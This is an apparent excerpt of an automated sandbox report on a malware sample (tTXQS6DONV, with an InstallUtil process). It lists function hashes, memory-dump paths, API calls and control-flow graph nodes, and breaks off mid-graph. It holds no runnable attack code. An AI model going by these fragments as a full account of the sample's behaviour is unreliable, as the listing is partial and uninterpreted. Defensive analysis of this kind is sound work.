                                • Instruction Fuzzy Hash: 49A120B0E152199FDB14DFA9C580AAEFBB2FF89301F24C1A9D419A7255D7309A41CFA0
                                Function 07B969D9 Relevance: .2, Instructions: 207COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 00000001.00000002.2895263698.0000000007B90000.00000040.00000800.00020000.00000000.sdmp, Offset: 07B90000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_1_2_7b90000_tTXQS6DONV.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 1363c3c3676d3dd3e7a858e580cdfccd952309f544097a349352226f59169411
                                • Instruction ID: a34e00ad9a5cb4c4083725ab4e2c3ae5bafc0d39d87fe0cb2e3bff64bfeae43e
                                • Opcode Fuzzy Hash: 1363c3c3676d3dd3e7a858e580cdfccd952309f544097a349352226f59169411
                                • Instruction Fuzzy Hash: 95918B70A1120ACFDB04DFA8E590ADDBBF5FF8A304F20D569D004BB259DB35AA458F50
                                Function 07B90006 Relevance: .2, Instructions: 188COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 00000001.00000002.2895263698.0000000007B90000.00000040.00000800.00020000.00000000.sdmp, Offset: 07B90000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_1_2_7b90000_tTXQS6DONV.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 3588e64290a9d337b6b0cf13e138a73c6e7381c04a799be5c58b65a893ef06d3
                                • Instruction ID: 07414849c6b48a3075821566257805ce0dfa74831d5eef55b51e447b39c7b360
                                • Opcode Fuzzy Hash: 3588e64290a9d337b6b0cf13e138a73c6e7381c04a799be5c58b65a893ef06d3
                                • Instruction Fuzzy Hash: BE813674E1524ADFCB48CFA9D48099DFBF2FF89210F1485A6E428EB265D7309A41CF51
                                Function 07B98BB8 Relevance: .2, Instructions: 180COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 00000001.00000002.2895263698.0000000007B90000.00000040.00000800.00020000.00000000.sdmp, Offset: 07B90000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_1_2_7b90000_tTXQS6DONV.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: e9cf4a129ce677682f44cdf1f5ec78bb397fda881bb03e3e8ba0ae229ab1b9ba
                                • Instruction ID: 8650758b27354133d3d22f64bb9c6089481a2ad7ae506b57e2bfb1af38de3fb6
                                • Opcode Fuzzy Hash: e9cf4a129ce677682f44cdf1f5ec78bb397fda881bb03e3e8ba0ae229ab1b9ba
                                • Instruction Fuzzy Hash: 4B811BB0E15219CFEB54CFA9D980A9EFBB2FF89200F24C1AAD419A7255D7309A41CF50
                                Function 07B90040 Relevance: .2, Instructions: 174COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 00000001.00000002.2895263698.0000000007B90000.00000040.00000800.00020000.00000000.sdmp, Offset: 07B90000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_1_2_7b90000_tTXQS6DONV.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: d166c589d25cf42e20617ccacc23cc8d81fd0cf0e1aa7628248fe60ece68db5a
                                • Instruction ID: 90884195459f58285b05b36b5c7ac33fc239e2d3310aabdb061178d16a8cee44
                                • Opcode Fuzzy Hash: d166c589d25cf42e20617ccacc23cc8d81fd0cf0e1aa7628248fe60ece68db5a
                                • Instruction Fuzzy Hash: CD71F474E1521ADFDB48CFA9D48499EFBF2FF89210F148566E428AB325D730AA41CF50
                                Function 07B98BA8 Relevance: .2, Instructions: 170COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 00000001.00000002.2895263698.0000000007B90000.00000040.00000800.00020000.00000000.sdmp, Offset: 07B90000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_1_2_7b90000_tTXQS6DONV.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 681c79c63ecfb6c3362e63a4122813ebfee1c97caaf48e96989e4b8ef79b97d3
                                • Instruction ID: b5e40f80e98cbe6626f3d6e095cfd0ac23b2c20acb5306248e7593353d7a4e9a
                                • Opcode Fuzzy Hash: 681c79c63ecfb6c3362e63a4122813ebfee1c97caaf48e96989e4b8ef79b97d3
                                • Instruction Fuzzy Hash: 8C712BB0E152199FEB54CFA9C980A9EBBF2FF89200F14C1AAD419A7355DB309A41CF51
                                Function 07B9003C Relevance: .2, Instructions: 170COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 00000001.00000002.2895263698.0000000007B90000.00000040.00000800.00020000.00000000.sdmp, Offset: 07B90000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_1_2_7b90000_tTXQS6DONV.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 6b02211aa5d89d6519e4cd4ecb593378887e81cb85e45cbecbbb7b32ebb60f65
                                • Instruction ID: 176b20834e7d1512537b5da78e25dc9520c8ed4fffe2459ce47508609ceea2c8
                                • Opcode Fuzzy Hash: 6b02211aa5d89d6519e4cd4ecb593378887e81cb85e45cbecbbb7b32ebb60f65
                                • Instruction Fuzzy Hash: 0C71E574E1111ADFDB48CFA9D58499EFBF2FF89210F148566E428AB325D730AA41CF50
                                Function 07B98BB4 Relevance: .2, Instructions: 168COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 00000001.00000002.2895263698.0000000007B90000.00000040.00000800.00020000.00000000.sdmp, Offset: 07B90000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_1_2_7b90000_tTXQS6DONV.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: ca2fc4941151ff44c0c8a00696f70bd4b94ca1089a6853f07b833b49612e7e2d
                                • Instruction ID: bd3b51d02f2ed5ee8832d66a9f2c87d1817aae75f40da580db17ccbb85529540
                                • Opcode Fuzzy Hash: ca2fc4941151ff44c0c8a00696f70bd4b94ca1089a6853f07b833b49612e7e2d
                                • Instruction Fuzzy Hash: 15712BB4E15219CFEB54CFA9C980A9EBBF2FF89200F24C5AAD419A7355D7309A41CF50
                                Function 07B95B68 Relevance: .1, Instructions: 129COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 00000001.00000002.2895263698.0000000007B90000.00000040.00000800.00020000.00000000.sdmp, Offset: 07B90000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_1_2_7b90000_tTXQS6DONV.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 4fa0b36f9e14dba1d52888e6512f49cc5bf542b71fc72fea357a4c75ba8b9673
                                • Instruction ID: 19490e625a8478ce60cb9c4db1570ca480286ed2a83c1884da002893cf268668
                                • Opcode Fuzzy Hash: 4fa0b36f9e14dba1d52888e6512f49cc5bf542b71fc72fea357a4c75ba8b9673
                                • Instruction Fuzzy Hash: 935131B0E11119CBDB24DFA9D5806AEFBB3FF89201F24C1BAD419A7245D7305A41CF61
                                Function 07B95B58 Relevance: .1, Instructions: 120COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 00000001.00000002.2895263698.0000000007B90000.00000040.00000800.00020000.00000000.sdmp, Offset: 07B90000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_1_2_7b90000_tTXQS6DONV.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 9cf2c53d80ef0b999c4d70c2d7aa73af986b92a7beb9521a6c3757e397b0522d
                                • Instruction ID: d5572ce9f95c8972f42643bd45dfaf6bf43fa6850781aaef896add2ba6e0fd22
                                • Opcode Fuzzy Hash: 9cf2c53d80ef0b999c4d70c2d7aa73af986b92a7beb9521a6c3757e397b0522d
                                • Instruction Fuzzy Hash: 9D5131B0D11215CBDB24DFA9C5805AEFBB3FF89201F24C57AD419A7245EB305941CF61
                                Function 07B95B64 Relevance: .1, Instructions: 117COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 00000001.00000002.2895263698.0000000007B90000.00000040.00000800.00020000.00000000.sdmp, Offset: 07B90000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_1_2_7b90000_tTXQS6DONV.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: d25daceb26a0a5620f49af72b409fbf388245a77c4f9151a13920fc48bceafc3
                                • Instruction ID: 3edb570236a1351787e4e463c5f3b17df50ee60c40934ccfad5b42e09dfcc456
                                • Opcode Fuzzy Hash: d25daceb26a0a5620f49af72b409fbf388245a77c4f9151a13920fc48bceafc3
                                • Instruction Fuzzy Hash: 98512EB0E111198BEB24DFA9C5805AEFBB3FF89201F24C57AD419A7255DB305A41CF61
                                Function 07B923D0 Relevance: .1, Instructions: 114COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 00000001.00000002.2895263698.0000000007B90000.00000040.00000800.00020000.00000000.sdmp, Offset: 07B90000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_1_2_7b90000_tTXQS6DONV.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 684152e2d33c71122d40ea34ad9d6a7b081d14a980a7d41e71c9d0499299c67e
                                • Instruction ID: 03f45bb7c4ff9c4a0a62caf751f81b903fddbaa36a18437ff8a04454691e9589
                                • Opcode Fuzzy Hash: 684152e2d33c71122d40ea34ad9d6a7b081d14a980a7d41e71c9d0499299c67e
                                • Instruction Fuzzy Hash: 29514AB1E106188BEB68DF6B8D4579EFBF7AFC9300F14C1BA951CA6264DB3019858F11
                                Function 07B923C9 Relevance: .1, Instructions: 106COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 00000001.00000002.2895263698.0000000007B90000.00000040.00000800.00020000.00000000.sdmp, Offset: 07B90000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_1_2_7b90000_tTXQS6DONV.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: e702d1b4b763e26d5d4d9c375b7937f27cedd42fe2afef6a098a7f04285856aa
                                • Instruction ID: 04780f4d7d1ad51b794e011b8f6262d0986f2ac111e3b265aea78103ca448ebb
                                • Opcode Fuzzy Hash: e702d1b4b763e26d5d4d9c375b7937f27cedd42fe2afef6a098a7f04285856aa
                                • Instruction Fuzzy Hash: AB412CB1E116188BEB58DF6B8D4579EFAF3BFC8300F14C5BA950CA6264EB3019858F11
                                Function 07B923CC Relevance: .1, Instructions: 103COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 00000001.00000002.2895263698.0000000007B90000.00000040.00000800.00020000.00000000.sdmp, Offset: 07B90000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_1_2_7b90000_tTXQS6DONV.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 6e5015c31beabb3afa1b62a84b4a3201c91a1a4f04fbdb98b9eec3d223ac6465
                                • Instruction ID: fe7bc8be0bc962438680dff46e2c4f38e36fbd44f4b97ea7e84f9c5f12d0142f
                                • Opcode Fuzzy Hash: 6e5015c31beabb3afa1b62a84b4a3201c91a1a4f04fbdb98b9eec3d223ac6465
                                • Instruction Fuzzy Hash: DC4128B1E116198BEB68DF6B8D4579EFAF3BFC8300F14C5BA951CA6264DB3009858F11
                                Function 07B91678 Relevance: .1, Instructions: 96COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 00000001.00000002.2895263698.0000000007B90000.00000040.00000800.00020000.00000000.sdmp, Offset: 07B90000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_1_2_7b90000_tTXQS6DONV.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 1ae06a8e56e5c74dc0522bd315c5ebffdb30042187536a96c421746f668eab88
                                • Instruction ID: 240ba74c694284257e6bb0b6e1d842d5849dc471db64b3a9a4e368df6ada1a55
                                • Opcode Fuzzy Hash: 1ae06a8e56e5c74dc0522bd315c5ebffdb30042187536a96c421746f668eab88
                                • Instruction Fuzzy Hash: 1541C7B4E0120EDBDB44CFAAC5415AEFBF2EF89300F24C5A9C419B7214E7349A419F95
                                Function 07B91674 Relevance: .1, Instructions: 94COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 00000001.00000002.2895263698.0000000007B90000.00000040.00000800.00020000.00000000.sdmp, Offset: 07B90000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_1_2_7b90000_tTXQS6DONV.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: ee9d8c9db2f2a4d0f71fc38662efcd0d9e6c67502b28623aaf7150b40cdeb8ed
                                • Instruction ID: 14ac474dc6a8dd0edcdecbc9c43e104cf13d965a2e42bf1e813011feb6e13efb
                                • Opcode Fuzzy Hash: ee9d8c9db2f2a4d0f71fc38662efcd0d9e6c67502b28623aaf7150b40cdeb8ed
                                • Instruction Fuzzy Hash: D341D7B4E0120EDFDB44CFAAC5415AEFBF2EF88300F24C5AAC419B7214E7349A419B95
                                Function 07B91668 Relevance: .1, Instructions: 94COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 00000001.00000002.2895263698.0000000007B90000.00000040.00000800.00020000.00000000.sdmp, Offset: 07B90000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_1_2_7b90000_tTXQS6DONV.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 4d7c01f520e835932333c10917d92121b6575e7b2c49d86d89462c10018cb5de
                                • Instruction ID: d74306b024259a39e86278c70d3f89ace54c03de76413fa968f22f84d175c62a
                                • Opcode Fuzzy Hash: 4d7c01f520e835932333c10917d92121b6575e7b2c49d86d89462c10018cb5de
                                • Instruction Fuzzy Hash: 6F41E8B5E0120EDBDB04CFAAC5415AEFBF2EF89310F24C5AAC419B7214E7349A419B95
                                Function 0742BEE8 Relevance: .1, Instructions: 65COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 00000001.00000002.2895061964.0000000007420000.00000040.00000800.00020000.00000000.sdmp, Offset: 07420000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_1_2_7420000_tTXQS6DONV.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 215e1531f63fefd6b9071ee0ddb24198d41307f2957637940ae23b3836470725
                                • Instruction ID: b16851936e4e143947cf32995d4530a378cf1fc3137fe01f8d15502cf7f50119
                                • Opcode Fuzzy Hash: 215e1531f63fefd6b9071ee0ddb24198d41307f2957637940ae23b3836470725
                                • Instruction Fuzzy Hash: A821D5B2E00A199BEB18CF6BD84069EFBF7EFC8210F54C47AC518A6214EB3415168F51
                                Function 07B91810 Relevance: .1, Instructions: 53COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 00000001.00000002.2895263698.0000000007B90000.00000040.00000800.00020000.00000000.sdmp, Offset: 07B90000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_1_2_7b90000_tTXQS6DONV.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 6bc378f0a4a6fb18b6652c14f132f4b19ce3e1b3636043d46d9a6fdff6288fcd
                                • Instruction ID: 6b2b8520b4431c05aa4db6cf19c60febaa968bf0521e76664d6acf779954fd84
                                • Opcode Fuzzy Hash: 6bc378f0a4a6fb18b6652c14f132f4b19ce3e1b3636043d46d9a6fdff6288fcd
                                • Instruction Fuzzy Hash: 2A11BCB5E116199BEB5CCF6BD94469EFAF3AFC8200F14C07AC518B6264EB3405468F51
                                Function 07B9181C Relevance: .1, Instructions: 51COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 00000001.00000002.2895263698.0000000007B90000.00000040.00000800.00020000.00000000.sdmp, Offset: 07B90000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_1_2_7b90000_tTXQS6DONV.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: eed33d2bd3da576515fdbef57bdd24b66013b2b56a7bee533c965d062c7142ef
                                • Instruction ID: f44ac5eb27522b346fa7e827905a080d299ee874da63cf33b399a2c331a7742a
                                • Opcode Fuzzy Hash: eed33d2bd3da576515fdbef57bdd24b66013b2b56a7bee533c965d062c7142ef
                                • Instruction Fuzzy Hash: 8A119AB1E116199BEB5CCFABC84469EFAF3AFC8200F14C07AD918B6264EB3405468F51

                                Execution Graph

                                Execution Coverage:6.9%
                                Dynamic/Decrypted Code Coverage:100%
                                Signature Coverage:0%
                                Total number of Nodes:11
                                Total number of Limit Nodes:2
                                execution_graph 26874 30bb398 DuplicateHandle 26875 30bb42e 26874->26875 26876 30bb150 26877 30bb196 GetCurrentProcess 26876->26877 26879 30bb1e8 GetCurrentThread 26877->26879 26880 30bb1e1 26877->26880 26881 30bb225 GetCurrentProcess 26879->26881 26882 30bb21e 26879->26882 26880->26879 26883 30bb25b 26881->26883 26882->26881 26884 30bb283 GetCurrentThreadId 26883->26884 26885 30bb2b4 26884->26885

                                Executed Functions

                                Function 06A360F8 Relevance: 21.6, Strings: 16, Instructions: 1648COMMON
                                Download Yara Rule
                                Strings
                                Memory Dump Source
                                • Source File: 00000005.00000002.3413424107.0000000006A30000.00000040.00000800.00020000.00000000.sdmp, Offset: 06A30000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_5_2_6a30000_InstallUtil.jbxd
                                Similarity
                                • API ID:
                                • String ID: X\-$'e\-$.Z\-$5X\-$<[\-$?e\-$@[\-$Nj\-$SZ\-$YX\-$[[\-$zZ\-$ze\-$X\-$Z\-$j\-
                                • API String ID: 0-631647230
                                • Opcode ID: cb6b02104798ab5d09e5e9d4a74ff296efeef982dcb001fa03f40553a20930c9
                                • Instruction ID: 7ea534662f13754452506923bf32f09d273b1f6bb7930b7cff80ca598377c8f0
                                • Opcode Fuzzy Hash: cb6b02104798ab5d09e5e9d4a74ff296efeef982dcb001fa03f40553a20930c9
                                • Instruction Fuzzy Hash: 3EE23B34E002199FDB64EBA8C994A9DB7F2FF85300F5485AAE409AB351EB70DD81CF51
                                Function 06A3A6F0 Relevance: 10.9, Strings: 8, Instructions: 870COMMON
                                Download Yara Rule
                                Strings
                                Memory Dump Source
                                • Source File: 00000005.00000002.3413424107.0000000006A30000.00000040.00000800.00020000.00000000.sdmp, Offset: 06A30000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_5_2_6a30000_InstallUtil.jbxd
                                Similarity
                                • API ID:
                                • String ID: _\-$'C\-$6C\-$E\\-$JB\-$@\-$B\-$\\-
                                • API String ID: 0-3056091361
                                • Opcode ID: b7cda5879e894dae6ed10edbea1dd085a38cb48bdd708037fbfed63fc77a9fd0
                                • Instruction ID: 6f67f02983acfd031084982cb845f80d8e94f3cf976f0b45e6d89a5b8ae0fe8f
                                • Opcode Fuzzy Hash: b7cda5879e894dae6ed10edbea1dd085a38cb48bdd708037fbfed63fc77a9fd0
                                • Instruction Fuzzy Hash: 93627C34B002298FDB54EBA8D5947ADB7F2EF89210F148469E546EF350EB75EC41CB90
                                Function 06A3C018 Relevance: 6.8, Strings: 5, Instructions: 522COMMON
                                Download Yara Rule

                                Control-flow Graph

                                • Executed
                                • Not Executed
                                control_flow_graph 985 6a3c018-6a3c036 987 6a3c038-6a3c03b 985->987 988 6a3c056-6a3c059 987->988 989 6a3c03d-6a3c04b 987->989 990 6a3c066-6a3c069 988->990 991 6a3c05b-6a3c065 988->991 997 6a3c051 989->997 998 6a3c0d0-6a3c0e6 989->998 993 6a3c06b-6a3c093 990->993 994 6a3c098-6a3c09b 990->994 993->994 995 6a3c0be-6a3c0c0 994->995 996 6a3c09d-6a3c0b9 994->996 999 6a3c0c2 995->999 1000 6a3c0c7-6a3c0ca 995->1000 996->995 997->988 1005 6a3c317-6a3c321 998->1005 1006 6a3c0ec-6a3c0f5 998->1006 999->1000 1000->987 1000->998 1007 6a3c322-6a3c32a 1006->1007 1008 6a3c0fb-6a3c120 1006->1008 1014 6a3c331-6a3c332 1007->1014 1015 6a3c32c-6a3c32e 1007->1015 1031 6a3c126-6a3c156 1008->1031 1032 6a3c304-6a3c311 1008->1032 1018 6a3c333-6a3c334 1014->1018 1019 6a3c339-6a3c33d 1014->1019 1016 6a3c330 1015->1016 1017 6a3c335 1015->1017 1016->1014 1022 6a3c336 1017->1022 1023 6a3c3ad-6a3c3af 1017->1023 1018->1017 1021 6a3c3b2-6a3c3d4 1018->1021 1024 6a3c33e-6a3c357 1019->1024 1033 6a3c3da-6a3c3eb 1021->1033 1034 6a3c598-6a3c5ae 1021->1034 1022->1024 1025 6a3c337-6a3c338 1022->1025 1023->1021 1026 6a3c359-6a3c35c 1024->1026 1025->1019 1029 6a3c362-6a3c371 1026->1029 1030 6a3c5c4-6a3c5c7 1026->1030 1043 6a3c373-6a3c38e 1029->1043 1044 6a3c390-6a3c3ac 1029->1044 1035 6a3c5ea-6a3c5ed 1030->1035 1036 6a3c5c9-6a3c5e5 1030->1036 1031->1032 1061 6a3c15c-6a3c165 1031->1061 1032->1005 1032->1006 1051 6a3c583-6a3c592 1033->1051 1052 6a3c3f1-6a3c414 1033->1052 1034->1030 1038 6a3c6b3-6a3c6b5 1035->1038 1039 6a3c5f3-6a3c60b 1035->1039 1036->1035 1045 6a3c6b7 1038->1045 1046 6a3c6bc-6a3c6bf 1038->1046 1063 6a3c615-6a3c618 1039->1063 1043->1044 1044->1023 1045->1046 1046->1026 1048 6a3c6c5-6a3c6ce 1046->1048 1051->1033 1051->1034 1052->1051 1068 6a3c41a-6a3c53d 1052->1068 1061->1007 1062 6a3c16b-6a3c18d 1061->1062 1077 6a3c193-6a3c1bb 1062->1077 1078 6a3c2f2-6a3c2fe 1062->1078 1066 6a3c61f-6a3c621 1063->1066 1069 6a3c623-6a3c629 1066->1069 1070 6a3c639-6a3c63d 1066->1070 1144 6a3c54b 1068->1144 1145 6a3c53f-6a3c549 1068->1145 1072 6a3c62b 1069->1072 1073 6a3c62d-6a3c62f 1069->1073 1074 6a3c64b 1070->1074 1075 6a3c63f-6a3c649 1070->1075 1072->1070 1073->1070 1079 6a3c650-6a3c652 1074->1079 1075->1079 1091 6a3c1c1-6a3c1e9 1077->1091 1092 6a3c2e8-6a3c2ed 1077->1092 1078->1032 1078->1061 1080 6a3c663-6a3c6a2 1079->1080 1081 6a3c654-6a3c657 1079->1081 1080->1029 1101 6a3c6a8-6a3c6b2 1080->1101 1081->1048 1091->1092 1100 6a3c1ef-6a3c21d 1091->1100 1092->1078 1100->1092 1107 6a3c223-6a3c22d 1100->1107 1107->1092 1109 6a3c233-6a3c26d 1107->1109 1118 6a3c278-6a3c294 1109->1118 1119 6a3c26f-6a3c273 1109->1119 1118->1078 1121 6a3c296-6a3c2e6 1118->1121 1119->1092 1120 6a3c275 1119->1120 1120->1118 1121->1078 1146 6a3c550-6a3c552 1144->1146 1145->1146 1146->1051 1147 6a3c554-6a3c559 1146->1147 1148 6a3c567 1147->1148 1149 6a3c55b-6a3c565 1147->1149 1150 6a3c56c-6a3c56e 1148->1150 1149->1150 1150->1051 1151 6a3c570-6a3c57c 1150->1151 1151->1051
                                Strings
                                Memory Dump Source
                                • Source File: 00000005.00000002.3413424107.0000000006A30000.00000040.00000800.00020000.00000000.sdmp, Offset: 06A30000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_5_2_6a30000_InstallUtil.jbxd
                                Similarity
                                • API ID:
                                • String ID: Ls\-$Ss\-$ms\-$|s\-$r\-
                                • API String ID: 0-1260384299
                                • Opcode ID: 1590f78f341170d1140aad05fd40476546d13e18a32e0ad32a7887f3d1b0908b
                                • Instruction ID: 34a372c3e16b8f563798e2ce45135ae2ec1e4b437bdc58c11bdfb2dfe64605c4
                                • Opcode Fuzzy Hash: 1590f78f341170d1140aad05fd40476546d13e18a32e0ad32a7887f3d1b0908b
                                • Instruction Fuzzy Hash: 2F028130B012169BDB58EBB8D8507AEB7F2FF85650F148569E806EF380EB75DC418B91
                                Function 06A30040 Relevance: 2.8, Instructions: 2760COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 00000005.00000002.3413424107.0000000006A30000.00000040.00000800.00020000.00000000.sdmp, Offset: 06A30000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_5_2_6a30000_InstallUtil.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 60c07fcd8e11ff2103cb529bedc37a0d40a3a2f7eb063505014e6442e30e5e00
                                • Instruction ID: 252baf22963cfaa5e7497765ecb9e5288c5347cdd60c5f3a54245171bdc3de98
                                • Opcode Fuzzy Hash: 60c07fcd8e11ff2103cb529bedc37a0d40a3a2f7eb063505014e6442e30e5e00
                                • Instruction Fuzzy Hash: 9E53E531D10B1A8ACB51EF68C880699F7B1FF99300F15D79AE4587B121EB70AAD4CF81
                                Function 06A333C8 Relevance: 2.3, Instructions: 2268COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 00000005.00000002.3413424107.0000000006A30000.00000040.00000800.00020000.00000000.sdmp, Offset: 06A30000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_5_2_6a30000_InstallUtil.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 7b40c97350c7bda955c9123e8775354fe27cc9c2829326e358c84977aa9d6388
                                • Instruction ID: 5d207d847609bb321349668a81e3c65f47eb9cadacb46eecd121b656ee281eb2
                                • Opcode Fuzzy Hash: 7b40c97350c7bda955c9123e8775354fe27cc9c2829326e358c84977aa9d6388
                                • Instruction Fuzzy Hash: BE33FC31D1065A8EDB11EF68C88059DF7B1FF99300F15D69AE458BB221EB70AAC5CF81
                                Function 06A396B0 Relevance: 1.9, Strings: 1, Instructions: 612COMMON
                                Download Yara Rule
                                Strings
                                Memory Dump Source
                                • Source File: 00000005.00000002.3413424107.0000000006A30000.00000040.00000800.00020000.00000000.sdmp, Offset: 06A30000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_5_2_6a30000_InstallUtil.jbxd
                                Similarity
                                • API ID:
                                • String ID: $
                                • API String ID: 0-3993045852
                                • Opcode ID: 7dce778df6b2c68743588884749d88c51f882f2cd2a976f1228b7c0227ef5efc
                                • Instruction ID: 8b14b00fb2f450cc8afbc7c898929e9848cd8246edd325f7e8dc8e4b0b7851db
                                • Opcode Fuzzy Hash: 7dce778df6b2c68743588884749d88c51f882f2cd2a976f1228b7c0227ef5efc
                                • Instruction Fuzzy Hash: C122A031E002658FDB64EBA4C4906AFB7F2FF85350F248469E44AEB355EA719C41CB91
                                Function 06A3FBBF Relevance: 6.9, Strings: 5, Instructions: 604COMMON
                                Download Yara Rule

                                Control-flow Graph

                                • Executed
                                • Not Executed
                                control_flow_graph 859 6a3fbbf 860 6a3fbc1 859->860 861 6a3fbf8 860->861 862 6a3fbfd-6a3fc1d 861->862 866 6a3fc22-6a3fc25 862->866 867 6a3fc27-6a3fc2d 866->867 868 6a3fc38-6a3fc3b 866->868 869 6a3fc33 867->869 870 6a3fae5-6a3faeb 867->870 871 6a3fc45-6a3fc48 868->871 872 6a3fc3d-6a3fc42 868->872 869->868 875 6a3faf1-6a3faf8 870->875 876 6a3fd95-6a3fd9b 870->876 873 6a3fc64-6a3fc67 871->873 874 6a3fc4a-6a3fc59 871->874 872->871 877 6a3fc89-6a3fc8c 873->877 878 6a3fc69-6a3fc7e 873->878 888 6a3fb3b-6a3fb3c 874->888 889 6a3fc5f 874->889 879 6a3fafd-6a3fb00 875->879 880 6a3fc92-6a3fd25 877->880 881 6a3fd2a-6a3fd2d 877->881 906 6a3fa64-6a3fa67 878->906 907 6a3fc84 878->907 884 6a3fb02-6a3fb08 879->884 885 6a3fb0d-6a3fb10 879->885 880->881 890 6a3fd33-6a3fd36 881->890 891 6a3fa54-6a3fa58 881->891 884->885 886 6a3fb12-6a3fb31 885->886 887 6a3fb36-6a3fb39 885->887 886->887 887->888 894 6a3fb41-6a3fb44 887->894 888->894 889->873 897 6a3fd52-6a3fd55 890->897 898 6a3fd38-6a3fd4d 890->898 895 6a3fa5a 891->895 896 6a3fa0e-6a3fa43 891->896 904 6a3fb46-6a3fb57 894->904 905 6a3fb5c-6a3fb5f 894->905 903 6a3fa5f-6a3fa62 895->903 920 6a3fa71-6a3fa74 896->920 971 6a3fa45 896->971 900 6a3fd57-6a3fd73 897->900 901 6a3fd78-6a3fd7a 897->901 898->897 900->901 909 6a3fd81-6a3fd84 901->909 910 6a3fd7c 901->910 903->906 911 6a3fa6c-6a3fa6f 903->911 904->905 913 6a3fb61-6a3fb63 905->913 914 6a3fb66-6a3fb69 905->914 906->911 907->877 918 6a3f973-6a3f976 909->918 919 6a3fd8a-6a3fd94 909->919 910->909 911->920 921 6a3fa79-6a3fa7c 911->921 913->914 923 6a3fb76-6a3fb79 914->923 924 6a3fb6b-6a3fb71 914->924 918->867 928 6a3f97c-6a3f97f 918->928 920->921 930 6a3fa9a-6a3fa9d 921->930 931 6a3fa7e-6a3fa95 921->931 926 6a3fb7b-6a3fb93 